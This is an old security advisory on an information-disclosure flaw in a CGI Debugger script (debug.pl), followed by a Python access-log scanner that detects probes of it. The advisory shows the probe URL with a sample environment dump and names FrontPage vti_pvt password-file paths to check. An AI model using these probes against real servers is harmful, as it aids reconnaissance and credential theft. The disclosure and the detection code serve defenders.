NeoErudition Technologies
By: Lawrence Lavigne

Vulnerability: CGI Debugger v1.0
Remote: YES
Risk: HIGH

I have not found any information on Packetstorm or Security-Focus about this issue, but that is not to say it has not been addressed elsewhere. For the security community's sake I will release what I can now.

Environment variables can be gleaned from a server running /cgi-bin/debug.pl by passing a bogus argument to the script.

Example: http://www.domain.com/cgi-bin/debug.pl/* will produce:

DOCUMENT_ROOT "/usr/home17/dir/public_html"
GATEWAY_INTERFACE "CGI/1.1"
HTTP_ACCEPT "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, */*"
HTTP_ACCEPT_ENCODING "gzip, deflate"
HTTP_ACCEPT_LANGUAGE "en-us"
HTTP_CONNECTION "Keep-Alive"
HTTP_COOKIE "$1"
HTTP_HOST "www.domain.com"
HTTP_USER_AGENT "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
LOG_DIR "/usr/local/etc/httpd/log6/dir"
PATH "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin"
QUERY_STRING ""
REMOTE_ADDR "XXX.XXX.XXX.XXX"
REMOTE_PORT "3899"
REQUEST_METHOD "GET"
REQUEST_URI "/directory/cgi-bin/debug.pl/"
REWRITE_ROOT "/usr/home17/dir/public_html"
SCRIPT_FILENAME "/usr/home17/dir/public_html/directory/cgi-bin/"
SCRIPT_NAME "/directory/cgi-bin/*"
SCRIPT_URI "http://www.domain.com/directory/cgi-bin/debug.pl/"
SCRIPT_URL "/directory/cgi-bin/debug.pl/*"
SERVER_ADDR "XXX.XXX.XXX.XXX"
SERVER_ADMIN "admin@domain.com"
SERVER_NAME "www.domain.com"
SERVER_PORT "80"
SERVER_PROTOCOL "HTTP/1.1"
SERVER_SIGNATURE ""
SERVER_SOFTWARE "Apache/1.3 (Unix) mod_perl/1.27 PHP/4.2.2 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.10 OpenSSL/0.9.6e"
UNIQUE_ID "PW1BEdH5k-4AAYO7Thw"

CANNOT EXECUTE:: /usr/home17/dir/public_html/directory/cgi-bin/

NOTE: This server's IP, domain and other sensitive information have been omitted.

Note the information provided about SERVER_SOFTWARE. Apache version 1.3 (Unix), which an attacker may know to have a remote vulnerability permitting execution of arbitrary commands. FrontPage 5.0.2.2510 may have no currently known vulnerabilities, but it could tip off an attacker to check for the various Vermeer Technologies Incorporated vti_pvt vulnerabilities such as /vti_pvt/service/pwd, /vti_pvt/administrators.pwd, etc. Thankfully OpenSSL 0.9.6e does not suffer from the arbitrary code execution vulnerability, but that seems moot considering what information debug.pl may provide an attacker with.

SERVER_SOFTWARE is by no means the only sensitive information being provided in this list. A skilled intruder can make use of much else that is here, which I will not detail.

Furthermore, executing debug.pl without an argument prompts for a script to execute or debug. Example: http://www.domain.com/cgi-bin/debug.pl will give the following output:

Usage: /directory/cgi-bin/debug.pl/script-to-run

With the information provided above and perhaps a quick audit, an intruder may be able to collect enough information to successfully guess possible scripts to run debug.pl against.

Possible Code Injection ?
Heap Overflow ?

NeoErudition Technologies
Lawrence Lavigne
administrator@neoerudition.net
http://neoerudition.net
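For administrators who need to find out whether this script has already been hit, the following Python script (an added example, not part of the original advisory and not code from NeoErudition) scans Apache combined-format access log lines for requests that reach debug.pl. It separates bare calls, which only print the usage line, from calls that carry PATH_INFO and therefore make the script echo its environment. The log lines, IP addresses, timestamps and response sizes are constructed for the example; the paths mirror the ones shown in the advisory.

```python
import re
from urllib.parse import unquote

# Apache "combined" access log format; the sample lines below are constructed
# for this example and follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Matches any request target whose script is debug.pl, capturing whatever
# follows it (the CGI PATH_INFO that the script treats as "script-to-run").
DEBUG_RE = re.compile(
    r'^(?P<script>.*?/debug\.pl)(?P<path_info>/[^?]*)?(?:\?(?P<query>.*))?$'
)

# Constructed sample: three hits on debug.pl from one host, one unrelated
# request, and one line that is not an access log record at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2002:14:03:11 -0400] "GET /directory/cgi-bin/debug.pl/* HTTP/1.1" 200 2148 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [10/Sep/2002:14:03:12 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Sep/2002:14:03:20 -0400] "GET /directory/cgi-bin/debug.pl HTTP/1.1" 200 89 "-" "Mozilla/4.0"',
    'this line is not an access log record',
    '203.0.113.7 - - [10/Sep/2002:14:03:41 -0400] "GET /directory/cgi-bin/debug.pl/%2A HTTP/1.1" 200 2148 "-" "Mozilla/4.0"',
]


def classify_target(target):
    """Return 'usage_probe', 'env_dump', or None for a request target.

    A bare call prints the script's usage line; any PATH_INFO makes the
    script try to run that path and, on failure, echo every environment
    variable ("CANNOT EXECUTE::"), which is the disclosure described above.
    Percent-encoding is undone first so "%2A" is seen as "*".
    """
    m = DEBUG_RE.match(unquote(target))
    if m is None:
        return None
    return 'env_dump' if m.group('path_info') else 'usage_probe'


def scan_access_log(lines):
    """Parse log lines and return one finding per request that reached debug.pl."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format record; skip rather than crash
        kind = classify_target(m.group('target'))
        if kind is None:
            continue
        findings.append({
            'ip': m.group('ip'),
            'time': m.group('ts'),
            'target': m.group('target'),
            'kind': kind,
            # 2xx means the CGI answered; 403/404 means it was already blocked
            'served': m.group('status').startswith('2'),
        })
    return findings


def summarize(findings):
    """Per-source-IP counts, so the noisiest host can be triaged first."""
    per_ip = {}
    for f in findings:
        entry = per_ip.setdefault(f['ip'], {'requests': 0, 'env_dumps_served': 0})
        entry['requests'] += 1
        if f['kind'] == 'env_dump' and f['served']:
            entry['env_dumps_served'] += 1
    return per_ip


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:12} served={f['served']} {f['target']}")
    print(summarize(scan_access_log(SAMPLE_LOG)))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file's lines; a host with a non-zero env_dumps_served count has already received the environment listing. The scan only tells you what was reached: the fix is to remove debug.pl from the web root or deny it in the server configuration.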